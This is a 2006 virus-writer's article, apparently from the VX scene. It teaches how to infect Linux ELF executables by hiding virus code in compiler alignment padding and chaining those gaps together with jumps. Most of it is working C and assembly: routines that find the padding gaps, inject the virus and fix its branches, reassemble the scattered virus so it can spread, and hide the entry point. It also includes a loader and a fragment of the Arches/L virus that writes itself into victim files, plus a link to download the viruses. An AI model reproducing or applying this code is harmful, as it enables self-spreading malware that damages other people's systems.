herm1t
August 2006
Not so long ago, i have read two articles concerned with amusing method of ELF-file infection [1,2], I want to talk about. It's amazing, but the tools presented by Z0mbie and Ares both intended to injecting trojans, and I still didn't saw any viruses using this technology, though may be I looked in the wrong direction. :-) Method is unusual and has both advantages and disadvantages, but let's discuss everything step by step.
In order to increase the perfomance of code the compiler will align functions, cycles, access to data and stack on the boundary multiple by power of two. You may see the alignment options of gcc by `cc1 --help`, but we will focus on how all these look like in code. Let's see:
805cb99: 89 0d 10 0e 0e 08 mov %ecx,0x80e0e10 805cb9f: 89 ec mov %ebp,%esp 805cba1: 5d pop %ebp ; one function ended 805cba2: c3 ret ; here 805cba3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi ; *padding* 805cba9: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi ; *padding* 805cbb0: 55 push %ebp ; here the next one 805cbb1: 89 e5 mov %esp,%ebp ; begins
As much as thirteen bytes in a single function! Precisely these islands of free space we will use to write our code to. We will infect the file as follows:
What we will get as a result? Here is what the virus loader injected in bash look like:
805c1f3: 60 pusha 805c1f4: 68 78 65 00 00 push $0x6578 805c1f9: e9 25 03 00 00 jmp 805c523 ---+ ....... .............. .................. | 805c523: 68 6c 66 2f 65 push $0x652f666c <--+ 805c528: e9 1b 02 00 00 jmp 805c748 ---+ ....... .............. .................. | 805c748: e9 c6 00 00 00 jmp 805c813 <==| 805c74d: 90 nop | 805c74e: 90 nop | 805c74f: 90 nop | ....... .............. .................. | 805c813: 68 63 2f 73 65 push $0x65732f63 <--+ 805c818: e9 06 03 00 00 jmp 805cb23 ---+ ....... .............. .................. | 805cb23: 68 2f 70 72 6f push $0x6f72702f <--+ 805cb28: 6a 05 push $0x5 805cb2a: 58 pop %eax 805cb2b: e9 73 00 00 00 jmp 805cba3 ---+ | ....... .............. .................. ....... .............. .................. 8060708: e9 47 01 00 00 jmp 8060854 ---+ 806070d: 90 nop | 806070e: 90 nop | 806070f: 90 nop | ....... .............. .................. | 8060854: 68 10 b5 05 08 push $0x805b510 <--+ 8060859: c3 ret New entry point: 0x805c1f3 Old entry point: 0x805b510
Let's consider each step individually.
As a preliminary we'll examine the list of instructions used for alignment (from the binutils, file gas/config/tc-i386.c):
{0x90}; /* nop */ {0x89,0xf6}; /* movl %esi,%esi */ {0x8d,0x76,0x00}; /* leal 0(%esi),%esi */ {0x8d,0x74,0x26,0x00}; /* leal 0(%esi,1),%esi */ {0x90, /* nop */ 0x8d,0x74,0x26,0x00}; /* leal 0(%esi,1),%esi */ {0x8d,0xb6,0x00,0x00,0x00,0x00}; /* leal 0L(%esi),%esi */ {0x8d,0xb4,0x26,0x00,0x00,0x00,0x00}; /* leal 0L(%esi,1),%esi */ {0x90, /* nop */ 0x8d,0xb4,0x26,0x00,0x00,0x00,0x00}; /* leal 0L(%esi,1),%esi */ {0x89,0xf6, /* movl %esi,%esi */ 0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */ {0x8d,0x76,0x00, /* leal 0(%esi),%esi */ 0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */ {0x8d,0x74,0x26,0x00, /* leal 0(%esi,1),%esi */ 0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */ {0x8d,0xb6,0x00,0x00,0x00,0x00, /* leal 0L(%esi),%esi */ 0x8d,0xbf,0x00,0x00,0x00,0x00}; /* leal 0L(%edi),%edi */ {0x8d,0xb6,0x00,0x00,0x00,0x00, /* leal 0L(%esi),%esi */ 0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */ {0x8d,0xb4,0x26,0x00,0x00,0x00,0x00, /* leal 0L(%esi,1),%esi */ 0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */ {0xeb,0x0d,0x90,0x90,0x90,0x90,0x90, /* jmp .+15; lotsa nops */ 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
We will search the above signatures with their checksum and length, which will reduce the table size. To lower the count of the false matches we will set the following restrictions:
InfELF uses more complicated search algorithm, but the one of ours gives reasonably good result, and need less memory and time.
To satisfy the third condition we'll use the length disassembler, mlde32 by uNdErX for instance. The found islands we'll place in the single linked list sorted by offsets:
typedef struct _island island_t; struct __attribute__((packed)) _island { uint32_t offset; /* offset */ uint32_t length; /* length */ island_t *next; /* the next item in the list */ };
We'll store the signatures in the patterns array:
struct { int length; /* length */ /* the offset within the found island from which we can place our code (1) */ int shift; uint32_t crc32; /* checksum */ } patterns[] = { {15, 1,0x11d50a7f}, {14, 1,0xe4ad564a}, {15, 2,0xd5cae9dc}, // EB 0D 90 90 ... {13, 1,0xd6b6dcfd}, {12, 1,0x19fbc1f4}, {11, 1,0x34a6685b}, {10, 1,0x74d8dd25}, {9, 1,0x6ed89f27}, {8, 1,0xb7109f48}, {7, 1,0x5d30a0da}, // C3 8D B6 00 00 00 00 };
(1) We need patterns.shift to satisfy the fourth condition. The first bytes of the signatures are either C3 (RET), or EB 0D (jmp .+15) we should not erase. Therefore, to obtain the offset and the length of the free space island we'll add shift to the offset and substract it from the length.
Here is the C code for the search routine:
island_t *islands = NULL, *p, *tail; unsigned char *ptr = m + text_offset; int op_len; while (ptr < m + text_offset + text_size) { for (i = 0; i < 10; i++) if (crc32(ptr, patterns[i].length) == patterns[i].crc32) { p = (island_t*)malloc(sizeof(island_t)); p->offset = (uint32_t)(ptr + patterns[i].shift); p->length = patterns[i].length - patterns[i].shift; p->next = NULL; if (islands == NULL) islands = p; else tail->next = p; tail = p; ptr += patterns[i].length; continue; } if ((op_len = mlde32(ptr)) <= 0) { fprintf(stderr, "Illegal instruction!\n"); return 2; } ptr += op_len; }
To satisfy the first condition we have to know the offset of the .text section in the file, its size and address. Let's walk through the file headers. The e_shstrndx field in the ELF file header hold the index of the string table section in the section headers table, and e_shnum the number of sections. We are interested in the following fields of the elements of section table:
The C code that will find the .text section:
// m - the pointer to the mmaped file Elf32_Ehdr *ehdr = (Elf32_Ehdr*)m; Elf32_Shdr *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff), *s; uint32_t strtab, text_addr, text_size, text_offset = 0; char *name; int i; // does the file have the string table? if (ehdr->e_shstrndx != SHN_UNDEF) { // get the offset of the string table strtab = shdr[ehdr->e_shstrndx].sh_offset; // look through all of the section headers for (i = 0, s = shdr; i < ehdr->e_shnum; i++, s++) { name = m + strtab + s->sh_name; // look for the section named ".text" if (!strncmp(name, ".text", 5)) { text_addr = s->sh_addr; text_size = s->sh_size; text_offset = s->sh_offset; break; } } }
Suppose that all of the virus instructions are stored already in the list of structures named "code", of the following type:
typedef struct _code code_t; struct __attribute__((packed)) _code { uint8_t *src; /* address in memory */ uint8_t *dst; /* address in victim map */ uint32_t len; /* length */ uint8_t *jmpto; /* destination address of JMP/CALL/Jcc, or 0 */ code_t *next; /* the next structure in list */ };
The only thing remaining for us to do is to insert as much commands to each island as possible, fill the "dst" field of "code_t" structures, link the islands together with jumps and fix the branch addresses. Here goes:
island_t *i; code_t *c; int n, l; for (i = islands, l = 0, c = code; c != NULL; ) // do we have enough space for the command in the current island // (taking in mind the jmp near in the end) if (l + c->len <= (i->length - 5)) { // save the address (we'll need it later) c->dst = i->offset + l; // copy the command memcpy(c->dst, c->src, c->len); // increase the counter of the used space for the // current island l += c->len; // move to the next command c = c->next; } else { // ... there is no space left // pad the remaining space with NOPs for (n = l; n < i->length; n++) *(uint8_t*)(i->offset + n) = 0x90; // if we have more islands, append the jmp near // to the next island if (i->next != NULL) { *((uint8_t *)(i->offset + l)) = 0xe9; *((uint32_t*)(i->offset + l + 1)) = i->next->offset - i->offset - l - 5; } else // we have no space at all, we can't infect this file... exit(2); // try to write this command to the next island i = i->next; l = 0; }
Fix the addresses of the branches:
for (c = code; c != NULL; c = c->next) // for each command with non zero branch address if (c->jmpto != 0) { // look for the command with the same address for (d = code; d != NULL; d = d->next) if (c->jmpto == d->src) { // fix the address *((uint32_t*)(c->dst + c->len - 4)) = d->dst - c->dst - c->len; break; } // not found. :-( the jump in the program leading to nowhere // will crash the program for sure. stop this until it's too late... if (d == NULL) exit(2); }
Here we came to the last and the most rugged part of the technology: we infected one file and to infect the next one we need to find our own code scattered through the file, reassemble it and remove the linking jumps out of it. We'll need for that the length disassembler, the virus entry point (we'll start disassembling from there) and the label at the end of the virus denoting that it's time to stop. To determine our own entry point we can not use the traditional virus mantra:
virus_start: pusha ... call delta delta: pop ebp sub ebp, (delta - virus_start)
Because all three commands (say nothing of the preceding) might lay in the hundreds of instructions one from another, that's why we will write our entry point to the body of the virus at the stage of infection. To identify where to, let's choose some command which will occure in our code only once, let it be "mov esp, ?":
mov eax, esp ; save esp mov esp, virus_start ; here we will write ; our new entry point mov [ebp + virus_entry], esp ; save to variable mov esp, eax ; restore esp
And the HLT instruction will be a signal for the disassembler that the virus has ended and it's time to return the result. We have another similar problem: when the work is done the virus must return the control to the infected host, if we use the "jmp near" command for that, we need to distinguish it from the other JMPs, to prevent the disassembler to follow it to the main program. We can place this jump immediately before the HLT and add the corresponding adjustment. And generally we can use the PUSH/RET instead of jump (we'll examine such possibility also).
code_t *code = NULL, *code_ret = NULL, code_vep = NULL; void reassemble(uint8_t *ptr) { code_t *c, *q; int op_len; for (;;) { // HLT if (*ptr == 0xf4) return; // do we already have command with that offset in the list? for (c = code; c != NULL; c = c->next) if (c->src == ptr) return; // get the length op_len = mlde32(ptr); // invalid opcode if (op_len <= 0) return; // fill the new list element c = (code_t*)malloc(sizeof(code_t)); c->src = ptr; c->jmpto = 0; c->len = op_len; c->next = NULL; // insert sort in ascending addresses order if (code == NULL || c->src < code->src) { c->next = code; code = c; } else { q = code; while (q->next != NULL && q->next->src < c->src) q = q->next; c->next = q->next; q->next = c; } // RET/RETN ? if (*ptr == 0xc3 || *ptr == 0xc2) return; // memorize the pointer to this element, latter we will // write new entry point in the argument of the command // MOV ESP, ? if (*ptr == 0xbc) code_vep = c; // CALL/JMP/Jcc ? if (*ptr == 0xe8 || *ptr == 0xe9 || (*ptr == 0x0f && (*(ptr + 1) & 0xf0) == 0x80)) { // calculate the branch address c->jmpto = ptr + op_len + *((uint32_t*)(ptr + op_len - 4)); // jmp? if (*ptr == 0xe9) { // if the HLT is follows, than this is // "jmp old_entry_point". memorize the address // of this element and increase the length for // HLT to be copied along with the jmp // as single instruction if (*(ptr + 5) == 0xf4) { code_ret = c; c->jmpto = 0; c->len++; } else { // go to the calculated address ptr = c->jmpto; continue; } } else { // CALL/JCC // recursive call. exit either after RET, or after // already disassembled instruction, or after the // end of the virus reassemble(c->jmpto); } } // move to the next command ptr += op_len; } } reassemble(virus_entry);
The virus code should not contain JMP/Jcc SHORT/LOOP/LOOPxx,JECXZ instructions. It is most likely that after injection the destination addresses of these commands will come out of range of +-128 bytes. Naturally, we can replace the above commands with their NEAR equivalents at runtime, but such replacements has any meaning only in the case when we are going not only to expand short commands to near, but also the reverse (otherwise the code doing the replacements will be executed once and will not be used further). Since we have not enough resources for the multipass optimization of code we will avoid the instructions listed above.
Now we need to remove the linking jumps from the reconstructed code. Since the list is sorted, it's sufficient to check is the jump pointing to the next command in list, if so, we can remove it. Like this:
for (prev = code, c = code->next; c->next != NULL; c = c->next) if (c->src[0] != 0xe9 || c->jmpto != c->next->src) { prev->next = c; prev = c; } prev->next = c;
A very little more is left to do: save the addresses we need in the body of the virus and fix the ELF-file header, so that entry point will refer to the begining of the virus. Break through the all necessary calculations:
#define DST2VADDR(x) (x - m - text_offset + text_addr) // code is the first command of virus, code->dst is the new entry point // we'll save it in the virus body (for disassembler). // code_vep, the pointer to the "mov esp, ?" we memorized // at the stage of disassembly *((uint32_t*)(code_vep->dst + 1)) = DST2VADDR(code->dst); // write the jump argument for return to the old entry point // code_ret, the pointer to the jump command we memorized // at the stage of disassembly *((uint32_t*)(code_ret->dst + 1)) = ehdr->e_entry - DST2VADDR(code_ret->dst) - 5; ehdr->e_entry = DST2VADDR(code->dst);
It's easy enough to add the EPO (entry point obscuring) to the infection routine described above. We need to add the following fragment to the free space search routine (we're looking through the file anyway, why not to find at the same time the instruction we can hang on):
uint8_t *firstcall = NULL; //... if (firstcall == 0 && *ptr == 0xe8) firstacall = ptr; for (i = 0; i < 10; i++) //...
And make over the final part (described in the previous chapter) in the following way:
// didn't found any call if (firstcall == NULL) exit(2); // calculate and save in code_ret the address the call pointed to *((uint32_t*)(code_ret->dst + 1)) = DST2VADDR(firstcall) + *((uint32_t*)(firstcall + 1)) - DST2VADDR(code_ret->dst); // update the CALL, so it will point to us *((uint32_t*)(firstcall + 1)) = DST2VADDR(code->dst) - DST2VADDR(firstcall) - 5;
All done. We don't touch entry point. Quite naturally, it wouldn't be the first CALL, or not a CALL, but JMP, and not a JMP, but whatever you want. But that all is up to you.
Let's look with fpstat how many space is available in average ELF-file:
$ for i in /bin/*;do ./fpstat $i;done| > awk 'BEGIN{a=0;c=0}/^Total/{if($2>0){c++;a+=$2}}END{print a,c,a/c}' 35740 84 425,476
It's a shade better with /usr/bin, but by a negligible margin:
590556 1368 431,693
So the bona fide programs are ready to donate 430 bytes on the average to our virus. It's possible to optimize the virus, but not at such degree. We can limit the infection to the large files like bash, vim or php, but also we can inject into the file only the loader and put the whole virus body in the end of the file, like it was suggested in [2]. The loader must:
Here comes:
_start: pusha ; h = open ("/proc/self/exe", O_RDONLY); push dword 0x00006578 push dword 0x652f666c push dword 0x65732f63 push dword 0x6f72702f movb eax, SYS_open mov ebx, esp movb ecx, 0 int 0x80 add esp, byte 16 or eax,eax js near exit xchg eax,ebx ; l = lseek (h, 0, 2); movb eax, SYS_lseek movb ecx, 0 movb edx, 2 int 0x80 or eax, eax js near exit ; l -= VIRUS_SIZE; sub eax, VIRUS_SIZE ; a = mmap(NULL,VIRUS_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE,h,l); mpush eax, ebx, MAP_PRIVATE, PROT_READ|PROT_EXEC,VIRUS_SIZE,0 mov ebx, esp movb eax, SYS_mmap int 0x80 add esp, byte 24 cmp eax, 0xfffff000 ja near exit lea ebx, [eax + (run - _start)] ; this instruction the disassembler will leave unattended (for good) jmp ebx ; to exit. the disassembler will stop where. jmp near exit run: ; save the virus entry point for disassembler (also we can map the ; file to the fixed address and than, we just need to replace the ; "self" variable with the choosen address) push eax ... pop edx mov self, edx push edx call reassemble ... exit: popa ; here, like it was promissed we are using the PUSH/RET to return ; the conmtrol to the host. HLT is not needed, disassembler will ; return on RET. db 0x68 __code_ret: dd fake_host ret
By the way, we no more need the special cases for the HLT and saving the virus entry point in the body of the virus, so we can remove the following fragments:
//... if (*ptr == 0xf4) return; //... if (*ptr == 0xbc) code_vep = c; //... if (*(ptr + 5) == 0xf4) { code_ret = c; c->len++; } //...
Now let's look what changes we have to do in the virus itself:
The fragment of the Arches/L virus:
; enlarge the file, so the length will be multiple of page size movb eax, SYS_ftruncate mov ebx, file_handle mov ecx, file_length add ecx, 4095 and ecx, 0xfffff000 mov edi, ecx int 0x80 or eax, eax jnz near unmap ; move the pointer to the end movb eax, SYS_lseek movb edx, 0 ;SEEK_SET int 0x80 cmp eax, ecx jne near unmap ; write the virus body movb eax, SYS_write mov ecx, self mov edx, VIRUS_SIZE int 0x80 cmp eax, edx jne near unmap ; move the pointer to the argument of PUSH command movb eax, SYS_lseek mov ecx, -VIRUS_SIZE + (__code_ret - _start) movb edx, 1 ; SEEK_CUR int 0x80 ; write the old entry point mov esi, file_map mov edx, [esi + e_entry] push edx mov eax, SYS_write mov ebx, file_handle mov ecx, esp movb edx, 4 int 0x80 add esp, edx cmp edx, eax jne near unmap ; calculate the new entry point mov eax, code mov eax, [eax + code_dst] sub eax, esi sub eax, text_offset add eax, text_addr ; change the entry point in the ELF header mov [esi + e_entry], eax
That's all, you comments is welcome. herm1t@vx.netlux.org
Download Arches,Arches/L viruses and the utilities